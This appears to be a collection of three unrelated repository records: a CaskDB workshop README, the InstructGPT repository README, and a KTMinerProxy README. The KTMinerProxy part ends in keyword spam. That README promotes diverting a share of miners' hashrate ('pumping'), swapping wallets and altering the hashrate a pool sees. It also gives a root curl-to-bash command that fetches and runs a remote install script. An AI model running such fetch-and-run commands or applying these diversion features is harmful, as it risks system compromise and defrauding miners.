high - Slow startup time since it needs to load all the keys in memory ## Community [![CaskDB Discord](https://img.shields.io/discord/851000331721900053)](https://discord.gg/HzthUYkrPp) Consider joining the Discord community to build and learn KV Store with peers. ## Dependencies CaskDB does not require any external libraries to run. For local development, install the packages from [requirements_dev.txt](requirements_dev.txt): pip install -r requirements_dev.txt ## Installation PyPi is not used for CaskDB yet ([issue #5](https://github.com/avinassh/py-caskdb/pull/5)), and you'd have to install it directly from the repository by cloning. ## Usage ```python disk: DiskStorage = DiskStore(file_name="books.db") disk.set(key="othello", value="shakespeare") author: str = disk.get("othello") # it also supports dictionary style API too: disk["hamlet"] = "shakespeare" ``` ## Prerequisites The workshop is for intermediate-advanced programmers. Knowing Python is not a requirement, and you can build the database in any language you wish. Not sure where you stand? You are ready if you have done the following in any language: - If you have used a dictionary or hash table data structure - Converting an object (class, struct, or dict) to JSON and converting JSON back to the things - Open a file to write or read anything. A common task is dumping a dictionary contents to disk and reading back ## Workshop **NOTE:** I don't have any [workshops](workshop.md) scheduled shortly. [Follow me on Twitter](https://twitter.com/iavins/) for updates. [Drop me an email](http://scr.im/avii) if you wish to arrange a workshop for your team/company. CaskDB comes with a full test suite and a wide range of tools to help you write a database quickly. [A Github action](https://github.com/avinassh/py-caskdb/blob/master/.github/workflows/build.yml) is present with an automated tests runner, code formatter, linter, type checker and static analyser. Fork the repo, push the code, and pass the tests! Throughout the workshop, you will implement the following: - Serialiser methods take a bunch of objects and serialise them into bytes. Also, the procedures take a bunch of bytes and deserialise them back to the things. - Come up with a data format with a header and data to store the bytes on the disk. The header would contain metadata like timestamp, key size, and value. - Store and retrieve data from the disk - Read an existing CaskDB file to load all keys ### Tasks 1. Read [the paper](https://riak.com/assets/bitcask-intro.pdf). Fork this repo and checkout the `start-here` branch 2. Implement the fixed-sized header, which can encode timestamp (uint, 4 bytes), key size (uint, 4 bytes), value size (uint, 4 bytes) together 3. Implement the key, value serialisers, and pass the tests from `test_format.py` 4. Figure out how to store the data on disk and the row pointer in the memory. Implement the get/set operations. Tests for the same are in `test_disk_store.py` 5. Code from the task #2 and #3 should be enough to read an existing CaskDB file and load the keys into memory Use `make lint` to run mypy, black, and pytype static analyser. Run `make test` to run the tests locally. Push the code to Github, and tests will run on different OS: ubuntu, mac, and windows. Not sure how to proceed? Then check the [hints](hints.md) file which contains more details on the tasks and hints. ### Hints - Check out the documentation of [struck.pack](https://docs.python.org/3/library/struct.html#struct.pack) for serialisation methods in Python - Not sure how to come up with a file format? Read the comment in the [format module](format.py) ## What next? I often get questions about what is next after the basic implementation. Here are some challenges (with different levels of difficulties) ### Level 1: - Crash safety: the bitcask paper stores CRC in the row, and while fetching the row back, it verifies the data - Key deletion: CaskDB does not have a delete API. Read the paper and implement it - Instead of using a hash table, use a data structure like the red-black tree to support range scans - CaskDB accepts only strings as keys and values. Make it generic and take other data structures like int or bytes. - While startup, current implementation loads values into memory. This is unnecessary and can be avoided. Just skip the value bytes and reading just the keys enough to build KeyDir ### Level 2: - Hint file to improve the startup time. The paper has more details on it - Implement an internal cache which stores some of the key-value pairs. You may explore and experiment with different cache eviction strategies like LRU, LFU, FIFO etc. - Split the data into multiple files when the files hit a specific capacity ### Level 3: - Support for multiple processes - Garbage collector: keys which got updated and deleted remain in the file and take up space. Write a garbage collector to remove such stale data - Add SQL query engine layer - Store JSON in values and explore making CaskDB as a document database like Mongo - Make CaskDB distributed by exploring algorithms like raft, paxos, or consistent hashing ## Name This project was named cdb earlier and now renamed to CaskDB. ## Line Count ```shell $ tokei -f format.py disk_store.py =============================================================================== Language Files Lines Code Comments Blanks =============================================================================== Python 2 391 261 103 27 ------------------------------------------------------------------------------- disk_store.py 204 120 70 14 format.py 187 141 33 13 =============================================================================== Total 2 391 261 103 27 =============================================================================== ``` ## Contributing All contributions are welcome. Please check [CONTRIBUTING.md](CONTRIBUTING.md) for more details. ## License The MIT license. Please check `LICENSE` for more details.
(educational) build your own disk based KV store
null
0
4
17
34
0
3
1
openai/following-instructions-human-feedback
# InstructGPT: Training Language Models to Follow Instructions with Human Feedback [Paper link][LINK_TO_PAPER] > Making language models bigger does not inherently make them better at following a user's intent. For example, large language models can generate outputs that are untruthful, toxic, or simply not helpful to the user. In other words, these models are not aligned with their users. In this paper, we show an avenue for aligning language models with user intent on a wide range of tasks by fine-tuning with human feedback. Starting with a set of labeler-written prompts and prompts submitted through the OpenAI-API, we collect a dataset of labeler demonstrations of the desired model behavior, which we use to fine-tune GPT-3 using supervised learning. We then collect a dataset of rankings of model outputs, which we use to further fine-tune this supervised model using reinforcement learning from human feedback (RLHF). We call the resulting models InstructGPT. In human evaluations on our prompt distribution, outputs from the 1.3B parameter InstructGPT model are preferred to outputs from the 175B GPT-3, despite having 100x fewer parameters. Moreover, InstructGPT models show improvements in truthfulness and reductions in toxic output generation while having minimal performance regressions on public NLP datasets. Even though InstructGPT still makes simple mistakes, our results show that fine-tuning with human feedback is a promising direction for aligning language models with human intent. ## Contents - [model-card.md](model-card.md) - InstructGPT model card - [automatic-eval-samples](automatic-eval-samples/) - Samples from our models (both GPT-3 and InstructGPT) on public NLP benchmarks. - [API distribution labeling instructions](https://docs.google.com/document/d/1MJCqDNjzD04UbcnVZ-LmeXJ04-TKEICDAepXyMCBUb8/edit#) - Google doc of instructions given to contractors for final evaluations on our API prompt distribution. - [Toxicity labeling instructions](https://docs.google.com/document/d/1d3n6AqNrd-SJEKm_etEo3rUwXxKG4evCbzfWExvcGxg/edit?usp=sharing) - Google doc of instructions given to contractors for labeling toxic outputs on the RealToxicityPrompts dataset [LINK_TO_PAPER]: https://cdn.openai.com/papers/Training_language_models_to_follow_instructions_with_human_feedback.pdf
null
null
0
960
1
5
3
1
0
kt007007/KTMinerProxy
<div id="top"></div> <!-- PROJECT LOGO --> <div align="center"> <img src="https://raw.githubusercontent.com/kt007007/KTMinerProxy/main/image/logo-1.png" alt="Logo" width="200" height="200"> <br> [![Contributors][contributors-shield]][contributors-url] [![Forks][forks-shield]][forks-url] [![Stargazers][stars-shield]][stars-url] [![Issues][issues-shield]][issues-url] <a href="https://github.com/kt007007/KTMinerProxy">English</a>๏ฝœ<a href="https://github.com/kt007007/KTMinerProxy/tree/main/Readme/hk">็นไฝ“ไธญๆ–‡</a> <h1> ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ ไฝ“้ชŒๅ…จๆ–ฐKT3.0, ๆ›ดๅไธบ๏ผˆRustMinerSystem๏ผ‰๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ ้กน็›ฎๅœฐๅ€ <a href="https://github.com/EvilGenius-dot/RustMinerSystem">https://github.com/EvilGenius-dot/RustMinerSystem</a> </h1> <h2> KTMinerProxyๅทฒๅœๆญข็ปดๆŠค๏ผŒ ไฝ†ไพๆ—งๅฏ็”จ๏ผŒ ๅฆ‚้œ€่Žทๅพ—ๆ›ดๅผบๅคงๅŠŸ่ƒฝๅŠ็ฒพๅ‡†็š„BTCใ€LTC็ญ‰ๆŠฝๆฐด๏ผŒ่ฏทไฝฟ็”จ<a href="https://github.com/EvilGenius-dot/RustMinerSystem">RustMinerSystem</a>ใ€‚ KTๅŠRustMinerSystemๅ‡บ่‡ชๅŒไธ€ๅ›ข้˜Ÿ, ่ฏทๆ”พๅฟƒไฝฟ็”จใ€‚ </h2> <p> Professional mine operation and maintenance tools, improve mine profits, detect abnormalities in mines and nodes, and become the best assistant of mines. (this software is only for use in legally licensed areas. If you use this software, it means that you accept this license by default. If you use it in a restricted area, you should bear the legal problems caused by it.) </p> <h3> The original tg account was stolen, please add a new group ๅŽŸๅ…ˆtg่ดฆๅท่ขซ็›—๏ผŒ่ฏทๆทปๅŠ ๅŠ ๆ–ฐ็พค็ป„๏ผŒ่ฐจ้˜ฒ่ฏˆ้ช—ใ€‚ <h3> The original account is lost and not operated by myself since February 26. Beware of fraud and new group links https://t.me/ +7kmdb-SRwXMxYmFl. Please forward it to each other in a large group. Recently, TG should have a certain vulnerability. Recently, a large number of accounts have been stolen. Pay attention to prevention. When adding strangers, do not display account information and send screenshots, otherwise they will be stolen. Be careful of new vulnerabilities </h3> <h3> Telegram๏ผš<a href="https://t.me/rustkt">https://t.me/rustkt</a> </h3> </div> <!-- <h1></h1> --> <!-- <h2>็ฎ€ไป‹</h2> --> <h1>KTMinerProxy</h1> <p>:zap: Original and genuine, powerful and powerful. Support lossless BTC ETC ETH LTC ERG CFX RVN SERO XMR CKB BEAM ALPH KASPA DCR FLUX NEOX and other currency pumping, no memory burst, experience full, 9000 units without pressure and no collapse, accurate to 24-hour data statistics of a single device , custom tunnel push tool and other powerful functions...</p> <p align="center"> <img src="./image/tiny.png" alt="Logo"> </p> <h2>One-click toolbox for Linux</h2> <p>The root user directly executes the following commands, and selects the corresponding function according to the prompts.</p> ``` bash <(curl -s -L https://raw.githubusercontent.com/kt007007/KTMinerProxy/main/linux-install.sh) ``` <h2>Disclaimer</h2> <p>This software is only for use in areas permitted by law. If you use this software, it means that you accept this license by default. If you use it in restricted areas, you will be responsible for legal problems.</p> # catalogue <ol> <li> <a href="#uplog">Changelog</a> </li> <li> <a href="#gn">Function </a> </li> <li> <a href="#install">Deploy software</a> <ul> <li> <a href="#linux">Linux</a> <ul> <li> <a href="#linux">Install</a> </li> <li> <a href="#linux">renew</a> </li> <li> <a href="#linux">uninstall</a> </li> <li> <a href="#linux">Out of service</a> </li> <li> <a href="#linux">start the service</a> </li> <li> <a href="#linux">restart the service</a> </li> <li> <a href="#linux">boot</a> </li> <li> <a href="#linux">Set the maximum number of connections</a> </li> <li> <a href="#linux">View program runtime log</a> </li> </ul> </li> <li> <a href="#windows">Windows</a> </li> <li> <a href="#_kenc">Local encryption client KENC</a> </li> </ul> </li> <li> <a href="#about">common problem</a> <ul> <li> <a href="#q15">memory related</a> </li> <li> <a href="#q0">process daemon</a> </li> <li> <a href="#q1">Default account password</a> </li> <li> <a href="#q1">Computing power is wavy</a> </li> <li> <a href="#q2">load balancing</a> </li> <li> <a href="#q3">prompt when installing curl: command not found</a> </li> <li> <a href="#q4">Modify the port to start</a> </li> <li> <a href="#q5">change Password</a> </li> <li> <a href="#q6">Prompt at startup dial tcp connection refused</a> </li> <li> <a href="#q7">close/delete port</a> </li> <li> <a href="#q8">Prompt during installation: Install killall failed! ! ! ! Please install psmisc manually before executing the installerใ€‚</a> </li> <li> <a href="#q9">WEB access is stuck in the LOADING interface for a long time.</a> </li> <li> <a href="#q11">IP blacklist</a> </li> <li> <a href="#q12">ETH, ETC chip machine</a> </li> <li> <a href="#q18">Innosilicon A11 series related issues</a> </li> <li> <a href="#q13">Local computing power modification</a> </li> <li> <a href="#q14">migrate</a> </li> <li> <a href="#q10">Development costs and loss of computing power</a> </li> <li> <a href="#q16">watcher link</a> </li> <li> <a href="#q17">Common reasons for insufficient computing power</a> </li> </ul> </li> <li><a href="#about">Disclaimer</a></li> <li><a href="#about">contact us</a></li> </ol> <span id="gn"></span> ### Core functions - Full currency non-destructive pumping - Advanced memory management mechanism, up to 8,000 single machines have been running stably so far - 24-hour statistical analysis of data accurate to a single device - TLS/SSL/KENC encryption - Supporting local encryption tools - Preset various currency mining pools (update at any time) - Soft anti cc - Multi-wallet configuration - Replace the specified wallet - Unified wallet - Mining pool mode - Quickly import and export all configurations - Modify the local computing power in the mining pool - IP blacklist - Custom RSA encryption key - Custom certificates - custom configuration - Drop reminder - The same watcher address as the mining pool official website - Ultra-low handling fee ### Coins that already support pumping (if you need to add a new currency, please contact the administrator in the telegram, usually it can be completed within one day) - BTC - ETC - ETH - LTC - ERG - CFX - RVN - SERO - XMR - CKB - BEAM - ALPH - KASPA - DCR - FLUX - NEOX - RXD - MEOW - LBC - CTXC - HNS - ALEO - DNX - ... <span id="uplog"></span> # Changelog ``` 2.9.8 Fixed several issues with kaspa 2.9.7 Added NEXA currency 2.9.6 Added DNX currency 2.9.5 Added ALEO currency 2.9.2 [Important update] Fixed the problem that the device would disconnect every time it works 2.9.0 Add meox currency (based on T-rex kernel test, if the certificate does not match, append --no-strict-ssl after the kernel startup command) Add ctxc currency (based on gminer test) Fix the problem that ckb, erg, flux, hns, lbc, neox, rvn may be invalid in some cases 2.8.9 Fixed ETHW hashrate display issue Fixed the problem that KASPA reported an error under bzminer 2.8.8 Added ETF and chipset Add ETHW and chipset 2.8.7 Fix the problem of excessive pumping due to anti-cheating bug 2.8.6 Fixed a bug that caused the software to crash for some small currencies Added LBC Added HNS 2.8.5 Added NEOX currency 2.8.4 FLUX can now be in lossless mode (gminer is recommended) 2.8.3 FLUX (compatibility mode) supported Fixed a bug in the display of the hashrate chart on the home page in some cases Added the display of the core or model of the chip machine 2.8.2 Fixed ETC devices appearing in wallets where they shouldn't be 2.8.1 Add hardware monitoring Added watcher address to close the fee option Add the log of sensitive operations, the log will be displayed in the original position of the announcement 2.8.0 [Important Update] [Security Update] Fixed a serious security vulnerability, remember to modify the [account] and [password] after the update 2.7.9 Added dcr pumping (compatibility mode) Optimized a possible error in etc, kaspa, bch, erg 2.7.8 Added the modification of the pumping ratio for a certain device Added alternate pumping address 2.7.7 Fixed the problem of some columns of erg Optimized the display of the number of online/offline devices 2.7.6 Fixed the issue that kaspa high was invalid 2.7.5 Added pure forwarding port, similar to nginx Added share last commit date Optimized page details and themes 2.7.4 [Important Update] Fixed a bug where custom certificates would be automatically restored, affecting 2.6.x-2.7.3 2.7.3 Optimized for new layouts and themes 2.7.2 Added new layouts and themes 2.7.1 Machines with the same name from different wallets are now displayed separately Added a custom RSA key for the KENC port (this function is only suitable for making a client by yourself, usually do not configure it, otherwise the kenc port will not be able to connect normally) 2.7.0 Fixed the problem that KASPA was invalid too high 2.6.9 Increased KASPA's pumping 2.6.8 Fixed an issue where custom configurations for several currencies could not be found when creating ports Fixed an issue that caused the software to crash when mining XMR Improved program stability 2.6.7 Added XMR computing power statistics Added ERG computing power statistics Added RVN computing power statistics Added error message that the kernel does not match the certificate Optimized XMR logs Fixed an issue with XMR multiple devices merging 2.6.6 Fixed the problem that ALPH was invalid too high Fixed a place where ETC generation could be invalid Modified the introduction of some currencies when adding ports 2.6.5 The push address of kenc is changed to an encrypted address. The encrypted address is only supported by the latest version of the kenc client. If this function is required, you need to download the kenc client and the 2.6.5 KT client again. Optimized logging of device details Optimized the login interface 2.6.4 Increased ALPH pumping 2.6.3 Fixed the problem that BEAM pumping was too high 2.6.2 [IMPORTANT UPDATE] Slightly increased ETH hashrate in some pools Reduced the invalidation of Yami devices on the ETH port Added BEAM pumping 2.6.1 Fixed the problem of high inefficiency of ERG Fixed the problem of high inefficiency of RVN 2.6.0 Added CKB pumping Optimized the output of the port log 2.5.9 Fixed an issue where A11 would disconnect under a certain pool Added port certificate batch replacement function, you can batch replace certificates in Settings - Certificate Management Fixed the problem that the rectangular chart does not display subcategories under the same category 2.5.8 Increased pumping of XMR 2.5.7 Added a rectangular view of port statistics, making it easier to see total statistics Fixed hashrate statistics for some small coins 2.5.6 Increased pumping for LTC 2.5.5 Increase SERO coin margin Implemented all computing power statistics that support small currency pumping 2.5.4 Fixed the problem of uneven distribution of computing power when the number of pumping wallets is greater than 1 2.5.3 Added observer link, edit port - advanced settings to open this function 2.5.2 Fixed the problem that chip machines such as Jasmine could not log in when connected to the ETH port Appropriately increased the memory usage a little bit to reduce the probability of invalidation 2.5.1 Support multiple designated wallets to replace to the target wallet Fixed the bug that ETC chip machine A11 and some small currencies may not work properly in lossless mode 2.5.0 Fixed the problem of excessive pumping in version 2.4.X Added the function of replacing the specified wallet address Added device name regex filter setting Fixed a situation where the hashrate statistic would not work in some cases Appropriately lowered the memory usage by about three times, and now a single device occupies 500kB memory 2.4.3 Added CFX rake Added ERG pumping Added RVN pumping Fixed a place where ETC chip machine and ETH chip machine could be invalid 2.4.2 Added support for nicehash 2.4.1 Fixed ETC chip machine related issues 2.4.0 Changed the logo Fixed the problem of too little BTC pumping Introduced ETC lossless mechanism Support ETC chip machine Updated the logic of BCH Added disconnection log to port log 2.3.3 Perfect A11 2.3.2 Added compatibility mode, you can try to use this mode when some currencies or models are invalid after working for a period of time and cannot continue to work Optimized for BTC, BTC models and mining pools that cannot be pumped can use compatibility mode to work Optimized for A11, if it is an A11 machine, please select ETH chip level and lossless mode for the port Updated KENC, all users who use KENC client please download the latest KENC Opened BTC unified wallet 2.3.1 Added KENC configuration push to settings Fixed some display issues on the page 2.3.0 BTC now supports all mining pools BTC introduces a lossless mechanism Implemented BTC computing power statistics BTC adds dynamic difficulty margin 2.2.7 Fixed the bug that the lossless logic temporarily failed in special cases Appropriately reduced the data size, reducing the memory footprint by 3/1 2.2.6 Fixed some memory related issues Fixed the problem that the TEAMRED kernel reported an error midway through Improve the lossless logic (need to scale test) 2.2.5 Fixed an issue where dynamic difficulty adjustment would not work in some cases Fixed the problem that some kernels dropped probabilistically The IP display of the device has been added to the device details 2.2.4 ETH has added a dynamic difficulty pumping mechanism, and cross-pools can also draw proportional computing power Slightly improved the computing power of the Phoenix kernel Fixed the problem that some kernels did not display the name and computing power 2.2.3 Added the function of local computing power modification 2.2.2 Greatly stabilizes the computing power compensation mechanism, giving you stable happiness 2.2.1 Innosilicon is supported, just select ETH chip machine when creating a port Fixed the problem with the name of the computing power compensation machine, and slightly increased the computing power of both parties Fixed the problem that the IP blacklist was lost due to the modification of the port on the webpage 2.2.0 Greatly reduces the loss of ETH Added difficulty stats 2.1.1 Fix the problem of losing a lot of computing power due to the new mechanism 2.1.0 Greatly reduces the loss of computing power in special network environments Kill the ghost device Fixed the problem that the machines in the mining pool were merged into defualt Fixed an issue with the TEAMRED kernel Added KENC Tunneling Protocol Added soft anti-CC strategy Added IP blacklist function TOKEN timed out and switched to the login page automatically retained the account password Fixed the problem that custom configuration Chinese could not be saved Fixed issues related to port certificates 2.0.1 Fixed the problem that the target machine's computing power was low due to BTC pumping 2.0.0 Implemented BTC and BCH rake Custom configurations can now be imported, exported and preserved across platforms 1.1.5 Fixed some pumping issues 1.1.4 Fixed disconnection bug caused by pumping 1.1.3 Implement disconnection reminder Fixed some places that could cause increased latency Support web page to modify web access port New security logic to avoid being scanned Support account modification Modified the problem that some kernels caused the name to be messed up 1.1.2 Greatly improve program stability 1.1.1 Greatly improve program stability Re-opened small currency forwarding 1.1.0 Fixed the problem of local computing power floating More stable and persistent connection Different ratios of different wallets are supported spare pool opened Added port log more gentle pumping Fixed the issue that Binyin's new TLS address could not be connected Increased device connection time Added wallet, machine name search Modified a place that is prone to memory leaks, and the program is more stable Fixed the problem that some small currency custom configurations did not take effect The new installation script is more convenient for management, and supports functions such as modifying the port at startup 1.0.0 fully effective pump share New pumping logic Install btc (to be tested) Sometimes the computing power of the device in the port is 0, don't worry, the display problem, if you are worried, you can observe the kernel output, just display the problem, it will be optimized later The development cost is now increased by 1/10,000 0.9.9 Multiple wallets can be configured Fixed the issue of share loss caused by opening the pump New get task logic, get the number of shares faster Added common custom configuration management The configuration of a port can be exported separately Optimize page details Displays the normal in-range share statistics chart The machine has added a log, click the machine to view the details to see (continuously updated) Added one-click default configuration Fixed the problem of inability to log in due to sn conflicts 0.1.1 Fixed the problem of memory explosion Modified the problem of excessive computing power of the pumping wallet When the port is closed, you can switch SSL and reconfigure the certificate Cancel the automatic update function Removed invalid settings 0.0.9 Fixed several critical issues that caused the software to crash Fixed the issue of lost shares caused by sticky packages Fixed the problem that the chart could not be seen at the first startup The pumping algorithm is changed to a random algorithm, and the curve is more stable Added port configuration TLS certificate function Added mining pool connection status test function Increase pump share statistics Add the original wallet address to view the lower right key of the login page to view the machine code 0.0.8 Modified the problem of the invalidation of the unified wallet for pumping Modified the pumping logic, now the frequency is higher, and the mining pool curve is more stable Add list paging and settings Fixed an issue where currencies with statistics in some cases would also display unknown devices 0.0.6: The default port number is changed to 16777 Change the process guard mode page optimization The data list is sorted by default Fixed the problem that the replacement port could not be started Currency that can be forwarded normally but does not support statistics, the device can now be displayed in the list Add configuration of pumping equipment name Added the configuration of the unified name of the mining pool mode Add language pack 0.0.5: Stability improvements Added some ETH preset mining pools Fixed the problem that the target mining pool cannot be connected to SSL ``` <!-- GETTING STARTED --> <p id="install"></p> <p id="linux"></p> # Linux ``` The root user directly executes the following commands, and selects the corresponding function according to the prompts. bash <(curl -s -L https://raw.githubusercontent.com/kt007007/KTMinerProxy/main/linux-install.sh) ``` ### After the installation is complete, please modify the login account, password and startup port immediately to prevent explosion. <img src="./image/t12.png" alt="Logo"> Supported Linux * Ubuntu 64 18.04+ * Centos 64 7+ <p id="windows"></p> # Windows After downloading, you can start it directly, the program comes with a process daemon <a href="https://github.com/kt007007/KTMinerProxy/tree/main/Windows-64">download link</a> <span id="_kenc"></span> # KENC <p> go to<a href="https://github.com/kt007007/KTMinerProxy/tree/main/KENC">https://github.com/kt007007/KTMinerProxy/tree/main/KENC</a>Download it yourself </p> <p><a href="#kenc">KENC Help Documentation</a></p> <p id="question"></p> <p id="about"></p> # common problem <span id="q0"></span> ## Process daemon <p>The program comes with a process guard, don't! don't want! Do not use supervisor or related tools to maintain the process, otherwise it will cause the process to be started repeatedly. </p> <span id="q1"></span> ## The computing power is wavy <img src="./image/t10.png" alt="Logo"><br> <p>If the situation in the above figure appears, it means that you have opened multiple KTMinerproxy with the same port, and you can close the redundant processes. </p> <p>If you make a mirror copy, the above problems will also occur. First execute the script to stop the program, then delete the /root/ktmproxy/license file, and then execute the startup.</p> <span id="q2"></span> ## load balancing <p>...</p> <span id="q3"></span> ## When installing, it prompts curl: command not found <p>The installation prompts curl: command not found, indicating that your linux does not have curl installed</p> <p>Execute apt-get update first</p> <p>Then execute apt install curl</p> <p>Wait for the command to complete, then execute the installation script</p> <span id="q4"></span> ## Modify the port to start <p>Execute the installation script, choose to modify the port to start, and enter the port number to be modified. </p> <span id="q5"></span> ## change Password <p>After installation, please go to the settings page as soon as possible to change the password. </p> <span id="q6"></span> ## prompt dial tcp connection refused at startup <p>Please add ktproxy.com to the firewall whitelist, this domain provides chart service and authentication</p> <span id="q7"></span> ## close/delete port <img src="./image/t11.png" alt="Logo"> <p>Click the specified location in the picture to delete/close the port</p> <span id="q8"></span> ## Installation prompt: install killall failed! ! ! ! <p>Check the server's mirror source and install psmisc manually</p> <span id="q9"></span> ## WEB access is stuck in the LOADING interface for a long time. <p>After installation or update, it may take a long time to load the web interface for the first time. If you haven't accessed it for a long time, please change the chrome browser. </p> <span id="q1"></span> ## Default account password <p>Default account: admin</p> <p>Default password: admin123</p> <span id="q10"></span> ## Computational power loss <p></p> <p>A variety of reasons can cause loss of computing power, check the following items, and don't deduct any shit from developers</p> <p></p> <p>Observe the proportion of the delay share in the mining pool, if the delay rate is higher than 1%, please ping the server to check the delay</p> <p></p> <p>The computing power of pumping varies from pool to pool. If the difficulty of the two pools is different, it will also lead to differences in computing power</p> <span id="q11"></span> ## IP blacklist <p></p> <p> Go to the settings page, the IP blacklist tab can actively join the IP blacklist</p> <p></p> <p><img src="./image/jt18.png"></p> <p></p> <span id="q12"></span> ## ETH, ETC chip machine <p></p> <p> Common models such as Cow, Jasmine, Yami, etc. need to use the ETH port. For Innosil series or other models, please select the ETH (GetWork) port</p> <p> If the device cannot be connected normally, try different types of ports alternately. </p> <p></p> <span id="q18"></span> ## Innosilicon A11 series related issues <p></p> <p> The A11 pumping pool needs to be the same as the target mining pool. </p> <p> If there is still high invalidation in the same pool, please downgrade or upgrade the firmware to a11_20211026_060307 version, mx needs to downgrade or upgrade to a11mx_20211220_124402 version. </p> <p></p> <span id="q13"></span> ## Local computing power modification <p></p> <p> When adding or editing ports, the local computing power of ETH and ETC can be modified under the [Advanced] tab</p> <p></p> <span id="q14"></span> ## service migration <p></p> <p> No matter what method is used to migrate the program, please delete the license file in the new directory after the migration, and then restart the program</p> <p></p> <span id="q15"></span> ## memory related <p></p> <p>At present, the peak memory usage of a single device is controlled at 1.5M, and it is in the long-term observation and adjustment stage. After that, the usage will be reduced according to the actual situation. Please determine the hardware configuration according to the number of connected devices</p> <p></p> <span id="q16"></span> ## Observer link <p></p> <p> Open Port Settings - Advanced Settings, find the watcher link, open and save it, and find the watcher link in the lower left corner of the port details page. </p> <span id="q17"></span> ## Common reasons for insufficient computing power <p>If the gap between the 24-hour average and the setting is too large after testing, for example, the setting is 1%, but the average is much less. There are many reasons for this to happen, and you need to check it step by step. </p> <p>Usually check whether the local is hit or not, or if there is a problem with the equipment. For example, some equipment in the transfer is inefficient and very inefficient. In this case, there is usually a problem with the card. It is usually easier to troubleshoot when it is found. In KT Find the device with high invalidity, click it to see if there are many POW-related keywords in the log, if there is, it means that the hardware of this device has a problem, resulting in the invalidity and low computing power. </p> <p>A more common reason is the local attack, which is very easy to encounter but difficult to troubleshoot. You can create a pure forwarding port in the KT, and use the pure forwarding port to test the 24-hour average of the device. If the port is not running enough for 24 hours, then there is a high probability that it is a local attack, and the local reinstallation of the clean system will solve the problem. </p> # Disclaimer <p id="flsm"> The developer maintains this software only under the drive of technology and hobby, and this software only verifies the technical process. Please follow local laws before use, and it is prohibited to use in areas where it is not allowed. The legal problems caused by the use of this software have nothing to do with the software author. </p> # contact us <p>Telegram: <a href="https://t.me/rustkt">https://t.me/rustkt</a></p> <p>Discord: <a href="https://discord.gg/NCsx4y8AR9">https://discord.gg/NCsx4y8AR9</a></p> <p align="right">(<a href="#top">back to top</a>)</p> [contributors-shield]: https://img.shields.io/github/contributors/kt007007/KTMinerProxy.svg?style=flat [contributors-url]: https://github.com/kt007007/KTMinerProxy/graphs/contributors [forks-shield]: https://img.shields.io/github/forks/kt007007/KTMinerProxy.svg?style=flat [forks-url]: https://github.com/kt007007/KTMinerProxy/network/members [stars-shield]: https://img.shields.io/github/stars/kt007007/KTMinerProxy.svg?style=flat [stars-url]: https://github.com/kt007007/KTMinerProxy/stargazers [issues-shield]: https://img.shields.io/github/issues/kt007007/KTMinerProxy.svg?style=flat [issues-url]: https://github.com/kt007007/KTMinerProxy/issues [license-shield]: https://img.shields.io/github/license/kt007007/KTMinerProxy.svg?style=flat
minerproxy็Ÿฟๆฑ ไธญ่ฝฌ๏ผŒๅŽŸๅˆ›minerproxy๏ผŒๅ”ฏไธ€ๆญฃ็‰ˆ๏ผŒๆ€ง่ƒฝๅผบๅคง, ๅŠŸ่ƒฝ้ฝๅ…จ, 9000ๅฐๆ— ๅŽ‹ๅŠ›ไธๅดฉๆบƒ๏ผŒBTC ETC ETH LTC็ญ‰ๅ…จๅธ็งๆ— ๆŸๆŠฝๆฐด๏ผŒไฝ“้ชŒๆ‹‰ๆปก็š„minerproxy, ่ฝฏ้˜ฒCC, ๅŠจๆ€้šพๅบฆ่ฐƒๆ•ดๆŠฝๆฐด๏ผŒไธ็ˆ†ๅ†…ๅญ˜ใ€‚ๆ”ฏๆŒ็ปๅคง้ƒจๅˆ†ๅธ็ง็š„่ฝฌๅ‘ใ€ๅŠ ๅฏ†ใ€่‡ชๅฎšไน‰ๆŠฝๆฐดใ€็ฒพ็กฎๅˆฐๅ•ๅฐ่ฎพๅค‡็š„24ๅฐๆ—ถๆ•ฐๆฎ็ปŸ่ฎกใ€่‡ชๅฎšไน‰้šง้“ๆŽจ้€ๅทฅๅ…ทใ€ไฟฎๆ”น็Ÿฟๆฑ ๆœฌๅœฐ็ฎ—ๅŠ›...ETHminerproxy, BTCminerproxy, ETCminerproxy, LTCminerproxy, ERGminerproxy, CFXminerproxy, RVNminerproxy, SEROminerproxy, XMRminerproxy, CKBminerproxy, BEAMminerproxy, ALPHminerproxy, KASPAminerproxy,minerproxy, proxy, KT minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, 